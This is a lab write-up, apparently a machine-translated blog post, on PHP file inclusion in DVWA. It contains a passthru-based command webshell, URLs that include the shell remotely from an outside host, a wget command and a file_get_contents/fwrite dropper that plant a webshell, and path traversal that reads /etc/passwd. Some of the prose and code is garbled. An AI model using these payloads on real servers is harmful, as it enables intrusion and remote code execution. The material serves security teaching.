Dvwa Article IV: File Containment Vulnerability

1      Test Environment Introduction

the test environment is DVWA Modules in the OWASP environment

2      Test Instructions2.1  What when a remote file contains a vulnerability

What is a " Remote file Containment Vulnerability "? The answer is: the server through the characteristics of PHP (function) to contain arbitrary files, because the file to be included in the source of the filter is not strict, so that can go to contain a malicious file, and we can construct this malicious file to achieve the evil purpose.

dangerous functions involved:include (), require () and include_once (), require_once ()

Include: contains and runs the specified file, the system gives a warning when an error occurs with an external file, but the entire php file continues to execute.

Require: The only difference with include is that when an error occurs,the include continues to run and Require stops running.

Include_once: This function is almost identical to the include function, except that he detects whether the file is imported before the function is imported. If it has been done again then it will not be executed again.

Require_once: The difference between this function and Require is the same as the include and include_once I mentioned above . So I won't repeat it.

PHP.ini configuration file:Allow_url_fopen=off can not contain remote files. PHP4 exists remotely & locally,php5 only has local inclusions.

2.2  why to include files

Programmers write programs, do not like to do the same thing, and do not like to write the same code (such as some common functions) several times, so the need to write the common code in a separate file, such as share.php, and then in other files to include the call. In PHP , we are using the functions listed above to achieve this goal, its workflow: If you want to include share.php in main.php, I will write the include (" Share.php ") to achieve the purpose, and then you can use the function in the share.php, like this to write dead need to include the file name of the natural no problem, there will be no loopholes, then the problem is exactly where?

Sometimes it may not be possible to determine which file to include, such as the following file index.php code:

CODE:

---------------------------------------------------------------------------------------------------

if ($_get[page]) {

Include $_get[page];

} else {

Include "home.php";

}

---------------------------------------------------------------------------------------------------

It's a normal section. PHP Code, how does it work?

The above code may be used in a format like this:

http://hi.baidu.com/m4r10/php/index.php?page=main.php or

http://hi.baidu.com/m4r10/php/index.php?page=downloads.php

In combination with the above code, simply say how it works:

1. Submit The URL aboveand get the value of this page in index.php ($_get[page]).

2. Judge $_get[page] is not empty, if not empty (here is main.php) use include to include this file.

3. if $_get[page] is empty, execute elseto include the "home.php" file.

2.3  why would a vulnerability be created ?

you may have to say, this is good, you can follow URL to dynamically include files, how convenient ah, how to create a loophole? The answer to the question is: we are not clever, we always like to be different from others, we do not follow his link to operate, we may want to write ourselves to include (call) the file, for example, we will randomly enter the following URL:http://hi.baidu.com/ m4r10/php/index.php?page=hello.php. Then our index.php program would be silly to follow the steps we said above to execute: Take page to hello.php, and then go to include (hello.php), The problem arises because we do not hello.php the file, so it will report a warning when it is include, similar to the following information:

Quote:

Warning:include (hello.php) [function.include]: failed to open stream:no such file or directory In/vhost/wwwroot/php/inde X.php on line 3

Warning:include () [function.include]:failed opening hello.php for inclusion (include_path=.:) in/vhost/wwwroot/php/ Index.phpon Line 3

pay attention to the one above. Warning just can't find the hello.php file we specified , which is the file containing the path we specified, and the warning behind is that the specified file was not found, so it was warned when it was included.

2.4  How to exploit vulnerabilities

As can be seen above, the problem arises, then how do we use such a loophole, the use of the method is actually a lot, but essentially is the same, I say here are three more common use methods:

1. include read out other files on the target machine

As we can see from the front, we can arbitrarily specify other sensitive files on the target host , as we can see the absolute path of exposure (vhost/wwwroot/php/ ), then we can probe multiple times to include other files, such as the specified URL :http://hi.baidu.com/m4r10/php/index.php?page=./txt.txt You can read the Txt.txt file under the current path , or you can use : /.. / Make directory jump (in no filter ). ), or you can directly specify an absolute path to read a sensitive system file, such as this URL:http://hi.baidu.com/m4r10/php/index.php?page=/etc/ passwd, if the target host does not have a strict limit on permissions, or the ability to start Apache is relatively high, you can read out the contents of this file. Otherwise you will get a similar to:open_basedir restriction in effect. of the Warning.

2. remote file contains a PHP Trojan that can be run

if the target host's "Allow_url_fopen" is activated (it is activated by default, few people will modify it), we can have more space to use, we can specify a different URL on a containing PHP Code Webshell to run directly, for example, I first write a run command of the PHP code, Save as cmd.txt(suffix is not important, as long as the content is PHP Format is available).

CODE:

--------------------------------------------------------------------------------

if (GET_MAGIC_QUOTES_GPC ())

{$_request["cmd"]=stripslashes ($_request["cmd");} Remove the escape character (you can remove the backslash character from the string)

Ini_set ("Max_execution_time", 0);// Set the execution time for this file,0 is Unlimited.

echo "M4r10 start line "; Print the returned start line prompt information

PassThru ($_request["cmd"]);// run cmd to specify the command

echo "M4r10 end Line "; The printed return end line prompts the message

?>

--------------------------------------------------------------------------------

The purpose of this file is to accept the cmd- specified command, and call the PassThru function to execute, returning the content between the m4r10 start line and the M4r10 end line. Save this file to our host server (can be a host that does not support PHP ), as long as it can be accessed via HTTP , such as the following address:Http://www.xxx.cn/cmd.txt, Then we can construct the following URL on the vulnerability host to take advantage of:http://hi.baidu.com/m4r10/php/index.php?page=http://www.xxx.cn/ Cmd.txt?cmd=ls, where cmd is followed by the command you need to execute, the other common commands (take *unix as an example) are as follows:

Quote:

ll column directory, file (equivalent to Windows dir)

PWD View current absolute path

ID whoami View current user

wget Download The file for the specified URL

wait for the other, your mainframe to go BAIDU to find it, it is not listed.

3. contains a PHP file to create a file

Maybe some people think it's still getting a real one on the target machine . Webshell More assured, in case one day people found here a contain bug fix, we can no longer remotely contain the above " pseudo " Webshell , is not it? Can understand this mentality, we continue. To get a real Webshell, we also say two common methods:

1) use commands such as wget to download a Webshell

This is relatively simple, but also very common, in the above we get the pseudo -Webshell , we can execute the command, then we can also call the system a very powerful role,wget, this command of the strong you can Google , a lot of parameters, absolutely dizzy you, hehe, we do not need to be so complicated, we use a -o(--output-document=file, the document is written to the file) you can, hehe.

If you are following the previous steps, put a PHP Code Webshell in a place that can be accessed via HTTP or FTP , such as:Http://www.xxx.cn/m4r10.txt, This file is written in Webshell content. We then execute the following URL in the pseudo-Webshell that we got earlier:http://hi.baidu.com/m4r10/php/index.php?page=http:// Www.xxx.cn/cmd.txt?cmd=wgethttp://www.xxx.cn/m4r10.txt-O m4r10.php, if the current directory can be written, you can get a call m4r10.php Webshell , if the current directory is not writable, you also need to think of other ways.

2) Use files to create

the previous wget may encounter a situation where the current directory cannot be written, or the target host is disabled (or not installed), we need to make a workaround, we can combine the previous include file vulnerability to include a file creation (write file) PHP Script with the following content:

CODE: [Copy to Clipboard]

--------------------------------------------------------------------------------------------------

$f =file_get_contents ("Http://www.xxx.cn/m4r10.txt");// open the file stream for the specified path

$ff =fopen ("./upload/m4r10.php", "a");// Find a possible directory, create a file

Fwrite ($FF, $f); write the previously opened file stream to the created file

Fclose ($FF); Close Save File

?>

--------------------------

3      Test Steps

This test only tests for sensitive information by including file vulnerabilities.

http://1.1.1.10/dvwa/vulnerabilities/fi/?page=include.php

650) this.width=650; "src=" Http://s1.51cto.com/wyfs02/M01/8A/E1/wKioL1g-eiTD_SFeAACHbLPEOqA837.png "title=" 1.png " alt= "Wkiol1g-eitd_sfeaachblpeoqa837.png"/>

directly in Edit the URL and replace the "include.php" page with".. /.. /phpinfo.php, you can access the content of the phpinfo.php page directly.

http://1.1.1.10/dvwa/vulnerabilities/fi/?page=../../phpinfo.php

650) this.width=650; "src=" Http://s1.51cto.com/wyfs02/M02/8A/E5/wKiom1g-ejSxVTmgAABzVNb0cX4540.png "title=" 2.png " alt= "Wkiom1g-ejsxvtmgaabzvnb0cx4540.png"/>

Reference Link:http://www.2cto.com/article/201011/79036.html

file contains the exploit reference link:

http://ixuehua.blog.163.com/blog/static/2599520382016765417338/

http://ixuehua.blog.163.com/blog/static/2599520382016782242901/

This article is from "Eagle a" blog, please make sure to keep this source http://laoyinga.blog.51cto.com/11487316/1878154

Dvwa Article IV: File Containment Vulnerability